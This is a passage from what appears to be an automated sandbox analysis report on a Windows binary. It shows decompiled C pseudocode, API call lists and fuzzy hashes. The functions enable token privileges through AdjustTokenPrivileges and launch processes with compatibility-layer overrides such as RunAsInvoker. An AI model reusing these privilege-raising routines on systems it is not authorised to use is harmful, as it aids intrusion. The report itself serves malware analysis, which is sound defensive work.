                                                                                                                					E00404951(_t66, _t59, _t62, 2, _t33);
                                                                                                                				} else {
                                                                                                                					free( *_t62);
                                                                                                                				}
                                                                                                                				_t60 =  *(_t66 + 0x1c);
                                                                                                                				_t36 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                                                				_t63 = _t66 + 0xc;
                                                                                                                				if( *(_t66 + 0x1c) != 0xffffffff) {
                                                                                                                					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
                                                                                                                				} else {
                                                                                                                					free( *_t63);
                                                                                                                				}
                                                                                                                				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
                                                                                                                				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
                                                                                                                				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
                                                                                                                				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
                                                                                                                				_t30 =  *(_t66 + 0x1c) - 1; // -1
                                                                                                                				return _t30;
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                • wcslen.MSVCRT ref: 004054EC
                                                                                                                • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                                                  • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                                                  • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                                                                  • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                                                • memcpy.MSVCRT ref: 00405556
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 726966127-0
                                                                                                                • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                                                                • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 81%
                                                                                                                			E00405ADF() {
                                                                                                                				void* _t25;
                                                                                                                				signed int _t27;
                                                                                                                				signed int _t29;
                                                                                                                				signed int _t31;
                                                                                                                				signed int _t33;
                                                                                                                				signed int _t50;
                                                                                                                				signed int _t52;
                                                                                                                				signed int _t54;
                                                                                                                				signed int _t56;
                                                                                                                				intOrPtr _t60;
                                                                                                                
                                                                                                                				_t60 =  *0x41c470;
                                                                                                                				if(_t60 == 0) {
                                                                                                                					_t50 = 2;
                                                                                                                					 *0x41c470 = 0x8000;
                                                                                                                					_t27 = 0x8000 * _t50;
                                                                                                                					 *0x41c474 = 0x100;
                                                                                                                					 *0x41c478 = 0x1000;
                                                                                                                					_push( ~(0 | _t60 > 0x00000000) | _t27);
                                                                                                                					L0040B26C();
                                                                                                                					 *0x41c458 = _t27;
                                                                                                                					_t52 = 4;
                                                                                                                					_t29 =  *0x41c474 * _t52;
                                                                                                                					_push( ~(0 | _t60 > 0x00000000) | _t29);
                                                                                                                					L0040B26C();
                                                                                                                					 *0x41c460 = _t29;
                                                                                                                					_t54 = 4;
                                                                                                                					_t31 =  *0x41c474 * _t54;
                                                                                                                					_push( ~(0 | _t60 > 0x00000000) | _t31);
                                                                                                                					L0040B26C();
                                                                                                                					 *0x41c464 = _t31;
                                                                                                                					_t56 = 2;
                                                                                                                					_t33 =  *0x41c478 * _t56;
                                                                                                                					_push( ~(0 | _t60 > 0x00000000) | _t33);
                                                                                                                					L0040B26C();
                                                                                                                					 *0x41c45c = _t33;
                                                                                                                					return _t33;
                                                                                                                				}
                                                                                                                				return _t25;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??2@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1033339047-0
                                                                                                                • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                                                • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Executed Functions

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
                                                                                                                				void* _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                				void* __esi;
                                                                                                                				_Unknown_base(*)()* _t16;
                                                                                                                				_Unknown_base(*)()* _t18;
                                                                                                                				long _t19;
                                                                                                                				_Unknown_base(*)()* _t22;
                                                                                                                				_Unknown_base(*)()* _t24;
                                                                                                                				struct HINSTANCE__** _t35;
                                                                                                                				void* _t37;
                                                                                                                
                                                                                                                				_t37 = __eflags;
                                                                                                                				_t35 = __eax;
                                                                                                                				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
                                                                                                                					return GetLastError();
                                                                                                                				}
                                                                                                                				_t16 = E00408F72(_t35);
                                                                                                                				__eflags = _t16;
                                                                                                                				if(_t16 != 0) {
                                                                                                                					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
                                                                                                                					__eflags = _t24;
                                                                                                                					if(_t24 != 0) {
                                                                                                                						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_v24.PrivilegeCount = 1;
                                                                                                                				_v12 = 2;
                                                                                                                				_a4 = _v8;
                                                                                                                				_t18 = E00408F72(_t35);
                                                                                                                				__eflags = _t18;
                                                                                                                				if(_t18 != 0) {
                                                                                                                					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
                                                                                                                					__eflags = _t22;
                                                                                                                					if(_t22 != 0) {
                                                                                                                						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t19 = GetLastError();
                                                                                                                				FindCloseChangeNotification(_v8); // executed
                                                                                                                				return _t19;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                  • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                                                • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                                                • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                                                • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                                                • API String ID: 616250965-1253513912
                                                                                                                • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                                                • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
                                                                                                                				WCHAR* _v8;
                                                                                                                				signed int _v12;
                                                                                                                				int _v16;
                                                                                                                				int _v20;
                                                                                                                				char* _v24;
                                                                                                                				int _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				int _v36;
                                                                                                                				int _v40;
                                                                                                                				char _v44;
                                                                                                                				void* _v56;
                                                                                                                				int _v60;
                                                                                                                				char _v92;
                                                                                                                				void _v122;
                                                                                                                				int _v124;
                                                                                                                				short _v148;
                                                                                                                				signed int _v152;
                                                                                                                				intOrPtr _v168;
                                                                                                                				intOrPtr _v172;
                                                                                                                				intOrPtr _v176;
                                                                                                                				intOrPtr _v180;
                                                                                                                				void _v192;
                                                                                                                				char _v196;
                                                                                                                				char _v228;
                                                                                                                				void _v258;
                                                                                                                				int _v260;
                                                                                                                				void _v786;
                                                                                                                				short _v788;
                                                                                                                				void _v1314;
                                                                                                                				short _v1316;
                                                                                                                				void _v1842;
                                                                                                                				short _v1844;
                                                                                                                				void _v18234;
                                                                                                                				short _v18236;
                                                                                                                				char _v83772;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				short* _t174;
                                                                                                                				short _t175;
                                                                                                                				signed int _t176;
                                                                                                                				short _t177;
                                                                                                                				short _t178;
                                                                                                                				int _t184;
                                                                                                                				signed int _t187;
                                                                                                                				intOrPtr _t207;
                                                                                                                				intOrPtr _t219;
                                                                                                                				int* _t252;
                                                                                                                				int* _t253;
                                                                                                                				int* _t266;
                                                                                                                				int* _t267;
                                                                                                                				wchar_t* _t270;
                                                                                                                				int _t286;
                                                                                                                				void* _t292;
                                                                                                                				void* _t304;
                                                                                                                				WCHAR* _t308;
                                                                                                                				WCHAR* _t310;
                                                                                                                				intOrPtr* _t311;
                                                                                                                				int _t312;
                                                                                                                				WCHAR* _t315;
                                                                                                                				void* _t325;
                                                                                                                				void* _t328;
                                                                                                                
                                                                                                                				_t304 = __edx;
                                                                                                                				E0040B550(0x1473c, __ecx);
                                                                                                                				_t286 = 0;
                                                                                                                				 *_a4 = 0;
                                                                                                                				_v12 = 0;
                                                                                                                				_v16 = 0;
                                                                                                                				_v20 = 0;
                                                                                                                				memset( &_v192, 0, 0x40);
                                                                                                                				_v60 = 0;
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				_v24 = 0;
                                                                                                                				_v40 = 0;
                                                                                                                				_v28 = 0;
                                                                                                                				_v36 = 0;
                                                                                                                				_v32 = 0x100;
                                                                                                                				_v44 = 0;
                                                                                                                				_v1316 = 0;
                                                                                                                				memset( &_v1314, 0, 0x208);
                                                                                                                				_v788 = 0;
                                                                                                                				memset( &_v786, 0, 0x208);
                                                                                                                				_t315 = _a8;
                                                                                                                				_t328 = _t325 + 0x24;
                                                                                                                				_v83772 = 0;
                                                                                                                				_v196 = 0x44;
                                                                                                                				E00404923(0x104,  &_v788, _t315);
                                                                                                                				if(wcschr(_t315, 0x25) != 0) {
                                                                                                                					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
                                                                                                                				}
                                                                                                                				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
                                                                                                                					_v8 = _t286;
                                                                                                                					_v1844 = _t286;
                                                                                                                					memset( &_v1842, _t286, 0x208);
                                                                                                                					_t328 = _t328 + 0xc;
                                                                                                                					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
                                                                                                                					if(_v1844 != _t286) {
                                                                                                                						E00404923(0x104,  &_v788,  &_v1844);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t308 =  &(_t315[0x2106]);
                                                                                                                				if( *_t308 == _t286) {
                                                                                                                					E00404B5C( &_v1316,  &_v788);
                                                                                                                					__eflags = _v1316 - _t286;
                                                                                                                					_t315 = _a8;
                                                                                                                					_pop(_t292);
                                                                                                                					if(_v1316 == _t286) {
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                					goto L10;
                                                                                                                				} else {
                                                                                                                					_v20 = _t308;
                                                                                                                					_t270 = wcschr(_t308, 0x25);
                                                                                                                					_pop(_t292);
                                                                                                                					if(_t270 == 0) {
                                                                                                                						L11:
                                                                                                                						_t174 =  &(_t315[0x220e]);
                                                                                                                						if( *_t174 != 1) {
                                                                                                                							_v152 = _v152 | 0x00000001;
                                                                                                                							_v148 =  *_t174;
                                                                                                                						}
                                                                                                                						_t309 = ",";
                                                                                                                						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
                                                                                                                							_v260 = _t286;
                                                                                                                							memset( &_v258, _t286, 0x3e);
                                                                                                                							_v124 = _t286;
                                                                                                                							memset( &_v122, _t286, 0x3e);
                                                                                                                							_v8 = _t286;
                                                                                                                							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
                                                                                                                							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
                                                                                                                							_v152 = _v152 | 0x00000004;
                                                                                                                							_t266 =  &_v260;
                                                                                                                							_push(_t266);
                                                                                                                							L0040B1F8();
                                                                                                                							_v180 = _t266;
                                                                                                                							_t328 = _t328 + 0x3c;
                                                                                                                							_t267 =  &_v124;
                                                                                                                							L0040B1F8();
                                                                                                                							_t292 = _t267;
                                                                                                                							_v176 = _t267;
                                                                                                                						}
                                                                                                                						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
                                                                                                                							_v260 = _t286;
                                                                                                                							memset( &_v258, _t286, 0x3e);
                                                                                                                							_v124 = _t286;
                                                                                                                							memset( &_v122, _t286, 0x3e);
                                                                                                                							_v8 = _t286;
                                                                                                                							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
                                                                                                                							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
                                                                                                                							_v152 = _v152 | 0x00000002;
                                                                                                                							_t252 =  &_v260;
                                                                                                                							_push(_t252);
                                                                                                                							L0040B1F8();
                                                                                                                							_v172 = _t252;
                                                                                                                							_t328 = _t328 + 0x3c;
                                                                                                                							_t253 =  &_v124;
                                                                                                                							_push(_t253);
                                                                                                                							L0040B1F8();
                                                                                                                							_v168 = _t253;
                                                                                                                						}
                                                                                                                						_t310 =  &(_t315[0x105]);
                                                                                                                						if( *_t310 != _t286) {
                                                                                                                							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
                                                                                                                								_push(_t310);
                                                                                                                							} else {
                                                                                                                								_v18236 = _t286;
                                                                                                                								memset( &_v18234, _t286, 0x4000);
                                                                                                                								_t328 = _t328 + 0xc;
                                                                                                                								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
                                                                                                                								_push( &_v18236);
                                                                                                                							}
                                                                                                                							_push( &_v788);
                                                                                                                							_push(L"\"%s\" %s");
                                                                                                                							_push(0x7fff);
                                                                                                                							_push( &_v83772);
                                                                                                                							L0040B1EC();
                                                                                                                							_v24 =  &_v83772;
                                                                                                                						}
                                                                                                                						_t175 = _t315[0x220c];
                                                                                                                						if(_t175 != 0x20) {
                                                                                                                							_v12 = _t175;
                                                                                                                						}
                                                                                                                						_t311 = _a4;
                                                                                                                						if(_t315[0x2254] == 2) {
                                                                                                                							E00401D1E(_t311, L"RunAsInvoker");
                                                                                                                						}
                                                                                                                						_t176 = _t315[0x265c];
                                                                                                                						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
                                                                                                                							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
                                                                                                                						}
                                                                                                                						_t177 = _t315[0x265e];
                                                                                                                						if(_t177 != 1) {
                                                                                                                							__eflags = _t177 - 2;
                                                                                                                							if(_t177 != 2) {
                                                                                                                								goto L37;
                                                                                                                							}
                                                                                                                							_push(L"16BITCOLOR");
                                                                                                                							goto L36;
                                                                                                                						} else {
                                                                                                                							_push(L"256COLOR");
                                                                                                                							L36:
                                                                                                                							E00401D1E(_t311);
                                                                                                                							L37:
                                                                                                                							if(_t315[0x2660] == _t286) {
                                                                                                                								__eflags = _t315[0x2662] - _t286;
                                                                                                                								if(_t315[0x2662] == _t286) {
                                                                                                                									__eflags = _t315[0x2664] - _t286;
                                                                                                                									if(_t315[0x2664] == _t286) {
                                                                                                                										__eflags = _t315[0x2666] - _t286;
                                                                                                                										if(_t315[0x2666] == _t286) {
                                                                                                                											L46:
                                                                                                                											_t178 = _t315[0x2a6e];
                                                                                                                											_t358 = _t178 - 3;
                                                                                                                											if(_t178 != 3) {
                                                                                                                												__eflags = _t178 - 2;
                                                                                                                												if(_t178 != 2) {
                                                                                                                													__eflags =  *_t311 - _t286;
                                                                                                                													if( *_t311 == _t286) {
                                                                                                                														_push(_t286);
                                                                                                                													} else {
                                                                                                                														_push(_t311);
                                                                                                                													}
                                                                                                                													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
                                                                                                                													L63:
                                                                                                                													_t293 = _t311;
                                                                                                                													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
                                                                                                                													_t312 = _t184;
                                                                                                                													if(_t312 == _t286 && _v60 != _t286) {
                                                                                                                														_t363 = _t315[0x266c] - _t286;
                                                                                                                														if(_t315[0x266c] != _t286) {
                                                                                                                															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
                                                                                                                															_a4 = _a4 | 0xffffffff;
                                                                                                                															_a8 = _t286;
                                                                                                                															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
                                                                                                                															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
                                                                                                                														}
                                                                                                                													}
                                                                                                                													E004055D1(_t184,  &_v44);
                                                                                                                													return _t312;
                                                                                                                												}
                                                                                                                												E00405497( &_v92);
                                                                                                                												E00405497( &_v228);
                                                                                                                												E0040149F(__eflags,  &_v92);
                                                                                                                												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
                                                                                                                												E00401551( &_v228, _t304, __eflags,  &_v92);
                                                                                                                												_t204 = _a4;
                                                                                                                												__eflags =  *_a4;
                                                                                                                												if(__eflags != 0) {
                                                                                                                													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
                                                                                                                												}
                                                                                                                												E00401421( &_v44, _t304,  &_v92, __eflags);
                                                                                                                												_t207 = _v28;
                                                                                                                												__eflags = _t207;
                                                                                                                												_v16 = 0x40c4e8;
                                                                                                                												if(_t207 != 0) {
                                                                                                                													_v16 = _t207;
                                                                                                                												}
                                                                                                                												_v12 = _v12 | 0x00000400;
                                                                                                                												E004054B9( &_v228);
                                                                                                                												E004054B9( &_v92);
                                                                                                                												_t286 = 0;
                                                                                                                												__eflags = 0;
                                                                                                                												L58:
                                                                                                                												_t315 = _a8;
                                                                                                                												_t311 = _a4;
                                                                                                                												goto L63;
                                                                                                                											}
                                                                                                                											E00405497( &_v92);
                                                                                                                											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
                                                                                                                											_t359 =  *_t311 - _t286;
                                                                                                                											if( *_t311 != _t286) {
                                                                                                                												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
                                                                                                                											}
                                                                                                                											E00401421( &_v44, _t304,  &_v92, _t359);
                                                                                                                											_t219 = _v28;
                                                                                                                											_v16 = 0x40c4e8;
                                                                                                                											if(_t219 != _t286) {
                                                                                                                												_v16 = _t219;
                                                                                                                											}
                                                                                                                											_v12 = _v12 | 0x00000400;
                                                                                                                											E004054B9( &_v92);
                                                                                                                											goto L58;
                                                                                                                										}
                                                                                                                										_push(L"HIGHDPIAWARE");
                                                                                                                										L45:
                                                                                                                										E00401D1E(_t311);
                                                                                                                										goto L46;
                                                                                                                									}
                                                                                                                									_push(L"DISABLEDWM");
                                                                                                                									goto L45;
                                                                                                                								}
                                                                                                                								_push(L"DISABLETHEMES");
                                                                                                                								goto L45;
                                                                                                                							}
                                                                                                                							_push(L"640X480");
                                                                                                                							goto L45;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
                                                                                                                					L10:
                                                                                                                					_v20 =  &_v1316;
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                			}

































































                                                                                                                0x00402675
                                                                                                                0x0040267e
                                                                                                                0x0040267e
                                                                                                                0x00402683
                                                                                                                0x0040268b
                                                                                                                0x0040269e
                                                                                                                0x0040269e
                                                                                                                0x004026a3
                                                                                                                0x004026ac
                                                                                                                0x004026b5
                                                                                                                0x004026b8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004026ba
                                                                                                                0x00000000
                                                                                                                0x004026ae
                                                                                                                0x004026ae
                                                                                                                0x004026bf
                                                                                                                0x004026c1
                                                                                                                0x004026c6
                                                                                                                0x004026cc
                                                                                                                0x004026d5
                                                                                                                0x004026db
                                                                                                                0x004026e4
                                                                                                                0x004026ea
                                                                                                                0x004026f3
                                                                                                                0x004026f9
                                                                                                                0x00402707
                                                                                                                0x00402707
                                                                                                                0x0040270d
                                                                                                                0x00402710
                                                                                                                0x0040276d
                                                                                                                0x00402770
                                                                                                                0x0040280b
                                                                                                                0x0040280e
                                                                                                                0x00402813
                                                                                                                0x00402810
                                                                                                                0x00402810
                                                                                                                0x00402810
                                                                                                                0x00402819
                                                                                                                0x0040281f
                                                                                                                0x00402836
                                                                                                                0x00402841
                                                                                                                0x00402846
                                                                                                                0x0040284a
                                                                                                                0x00402851
                                                                                                                0x00402857
                                                                                                                0x00402860
                                                                                                                0x00402865
                                                                                                                0x00402876
                                                                                                                0x00402879
                                                                                                                0x00402888
                                                                                                                0x00402888
                                                                                                                0x00402857
                                                                                                                0x00402891
                                                                                                                0x0040289c
                                                                                                                0x0040289c
                                                                                                                0x00402779
                                                                                                                0x00402784
                                                                                                                0x0040278d
                                                                                                                0x004027a4
                                                                                                                0x004027b3
                                                                                                                0x004027b8
                                                                                                                0x004027bb
                                                                                                                0x004027bf
                                                                                                                0x004027c6
                                                                                                                0x004027c6
                                                                                                                0x004027d1
                                                                                                                0x004027d6
                                                                                                                0x004027d9
                                                                                                                0x004027db
                                                                                                                0x004027e2
                                                                                                                0x004027e4
                                                                                                                0x004027e4
                                                                                                                0x004027e7
                                                                                                                0x004027f4
                                                                                                                0x004027fc
                                                                                                                0x00402801
                                                                                                                0x00402801
                                                                                                                0x00402803
                                                                                                                0x00402803
                                                                                                                0x00402806
                                                                                                                0x00000000
                                                                                                                0x00402806
                                                                                                                0x00402715
                                                                                                                0x00402729
                                                                                                                0x0040272e
                                                                                                                0x00402731
                                                                                                                0x00402738
                                                                                                                0x00402738
                                                                                                                0x00402743
                                                                                                                0x00402748
                                                                                                                0x0040274d
                                                                                                                0x00402754
                                                                                                                0x00402756
                                                                                                                0x00402756
                                                                                                                0x00402759
                                                                                                                0x00402763
                                                                                                                0x00000000
                                                                                                                0x00402763
                                                                                                                0x004026fb
                                                                                                                0x00402700
                                                                                                                0x00402702
                                                                                                                0x00000000
                                                                                                                0x00402702
                                                                                                                0x004026ec
                                                                                                                0x00000000
                                                                                                                0x004026ec
                                                                                                                0x004026dd
                                                                                                                0x00000000
                                                                                                                0x004026dd
                                                                                                                0x004026ce
                                                                                                                0x00000000
                                                                                                                0x004026ce
                                                                                                                0x004026ac
                                                                                                                0x00402443
                                                                                                                0x0040246a
                                                                                                                0x00402470
                                                                                                                0x00000000
                                                                                                                0x00402470

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00402300
                                                                                                                • memset.MSVCRT ref: 0040233E
                                                                                                                • memset.MSVCRT ref: 00402356
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                • wcschr.MSVCRT ref: 00402387
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                                                  • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                                                  • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                                                • wcschr.MSVCRT ref: 004023B7
                                                                                                                • memset.MSVCRT ref: 004023D9
                                                                                                                • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                                                • wcschr.MSVCRT ref: 0040242B
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                                                • memset.MSVCRT ref: 004024BE
                                                                                                                • memset.MSVCRT ref: 004024D1
                                                                                                                • _wtoi.MSVCRT ref: 00402519
                                                                                                                • _wtoi.MSVCRT ref: 0040252B
                                                                                                                • memset.MSVCRT ref: 00402561
                                                                                                                • memset.MSVCRT ref: 00402574
                                                                                                                • _wtoi.MSVCRT ref: 004025BC
                                                                                                                • _wtoi.MSVCRT ref: 004025CE
                                                                                                                • wcschr.MSVCRT ref: 004025F0
                                                                                                                • memset.MSVCRT ref: 0040260F
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                                                • _snwprintf.MSVCRT ref: 0040264C
                                                                                                                • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                                                • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                                                • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                                                • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                                                • API String ID: 2452314994-435178042
                                                                                                                • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                                                • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 89%
